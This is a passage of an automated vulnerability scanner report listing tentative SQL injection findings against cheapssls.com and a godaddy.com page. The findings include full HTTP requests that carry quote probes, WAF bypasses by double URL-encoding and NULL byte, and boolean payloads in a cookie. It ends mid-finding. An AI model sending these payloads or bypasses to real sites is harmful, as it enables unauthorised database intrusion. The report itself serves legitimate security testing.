ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome%2527%2527&ve%5Bos%5D=Windows&ve%5Bclient_language%5D=en-US&ve%5Breferrer%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Bscreen_x%5D=1920&ve%5Bscreen_y%5D=1200&ve%5Bcolor%5D
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:50:30 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:50:29 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.14. https://www.cheapssls.com/index.php [ve%5Bbrowser_version%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.cheapssls.com
Path:   /index.php

Issue detail

The ve%5Bbrowser_version%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ve%5Bbrowser_version%5D parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 485
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.22.9.1315085570462; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A6%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A6%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A6

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218'&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows&ve%5Bclient_language%5D=en-US&ve%5Breferrer%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl.html&ve%5Bscreen_x%5D=1920&ve%5Bscreen_y
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:53:18 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=g6klbngno3a2v876ve7g981qf7; expires=Sat, 17-Sep-2011 21:53:18 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=51f1b%250d%250af904b85b4d7; expires=Sun, 02-Sep-2012 21:53:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:53:17 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 485
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.22.9.1315085570462; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A6%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A6%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A6

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218''&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows&ve%5Bclient_language%5D=en-US&ve%5Breferrer%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl.html&ve%5Bscreen_x%5D=1920&ve%5Bscreen_y
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:53:20 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:53:19 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.15. https://www.cheapssls.com/index.php [ve%5Bclient_language%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.cheapssls.com
Path:   /index.php

Issue detail

The ve%5Bclient_language%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ve%5Bclient_language%5D parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 485
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.22.9.1315085570462; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A6%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A6%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A6

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows&ve%5Bclient_language%5D=en-US'&ve%5Breferrer%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl.html&ve%5Bscreen_x%5D=1920&ve%5Bscreen_y%5D=1200&ve%5Bcolor%5D=16&ve%5Btime_begin%5D=1315085544.8744

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:28 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=10es6k81pc1o6s61hl49jh1ft4; expires=Sat, 17-Sep-2011 21:55:28 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=134386+and+2%3D2--+; expires=Sun, 02-Sep-2012 21:55:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:28 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 485
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.22.9.1315085570462; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A6%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A6%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A6

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows&ve%5Bclient_language%5D=en-US''&ve%5Breferrer%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl.html&ve%5Bscreen_x%5D=1920&ve%5Bscreen_y%5D=1200&ve%5Bcolor%5D=16&ve%5Btime_begin%5D=1315085544.8744

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:30 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:29 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.16. https://www.cheapssls.com/index.php [ve%5Bos%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.cheapssls.com
Path:   /index.php

Issue detail

The ve%5Bos%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ve%5Bos%5D parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ve%5Bos%5D request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 485
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.22.9.1315085570462; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A6%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A6%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A6

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows%2527&ve%5Bclient_language%5D=en-US&ve%5Breferrer%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl.html&ve%5Bscreen_x%5D=1920&ve%5Bscreen_y%5D=1200&ve%5Bcolor%5D=16&ve%5Btime_begin%
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:03 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=oeriroaec2ic68rk7n1cd2rg94; expires=Sat, 17-Sep-2011 21:55:03 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=134386+and+2%3D2--+; expires=Sun, 02-Sep-2012 21:55:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:02 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 485
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.22.9.1315085570462; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A6%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A6%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A6

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows%2527%2527&ve%5Bclient_language%5D=en-US&ve%5Breferrer%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl.html&ve%5Bscreen_x%5D=1920&ve%5Bscreen_y%5D=1200&ve%5Bcolor%5D=16&ve%5Btime_begin%
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:06 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:05 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.17. https://www.cheapssls.com/index.php [ve%5Burl%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.cheapssls.com
Path:   /index.php

Issue detail

The ve%5Burl%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ve%5Burl%5D parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart%00'&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows&ve%5Bclient_la
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:49:20 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=5kmg5l9v8a0jd8f6a9e6qhrhf2; expires=Sat, 17-Sep-2011 21:49:20 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=51f1b%250d%250af904b85b4d7; expires=Sun, 02-Sep-2012 21:49:20 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:49:20 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart%00''&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows&ve%5Bclient_la
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:49:24 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:49:23 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.18. http://www.godaddy.com/gdshop/offers/cross_sell.asp [ASPSESSIONIDACSTCQTS cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.godaddy.com
Path:   /gdshop/offers/cross_sell.asp

Issue detail

The ASPSESSIONIDACSTCQTS cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ASPSESSIONIDACSTCQTS cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM'%20and%201%3d1--%20; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; expires=Sun, 02-Sep-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: traffic=server=M1PWCORPWEB109&sitename=www%2Egodaddy%2Ecom&cookies=1&split=14&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2Fssl%2Fssl%2Dcertificates%2Easpx%3Fci%3D8346&isc=&privatelabelid=1&page=%2Fgdshop%2Foffers%2Fcross%5Fsell%2Easp&referringdomain=&referringpath=19a7e39c%2Ddcff%2D40f6%2D8f6d%2De19d0c50259d&shopper=46215917&querystring=ci%3D42031%26config%3Dssldefault; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:49:51 GMT
Content-Length: 275694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Low cost domain names, domain transfers, web hosting, email accounts, and so much more.</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Pragma" content="no-cache">
<meta name="description" content="Register & transfer domains for less. Reliable hosting. Easy-to-use site builders. Affordable SSL certificates. eCommerce solutions. ICANN-accredited.">
<meta name="keywords" content="domain name, domain registration, registrar, renewal, transfer domain, cheap, inexpensive, domain, register, DNS, URL, web address, internet address, web site name, bulk domain registration, buy domain, private domain registration, bulk price, .com, .net, .org, Go Daddy.com, Go Daddy, godaddy.com, godaddy">
<link rel="shortcut icon" href="http://imagesak.securepaynet.net/assets/godaddy.ico">
<link rel="stylesheet" type="text/css" href="http://img2.wsimg.com/pc_css/1/gd_20110829_http.min.css" /><link rel="stylesheet
...[SNIP]...

Request 2

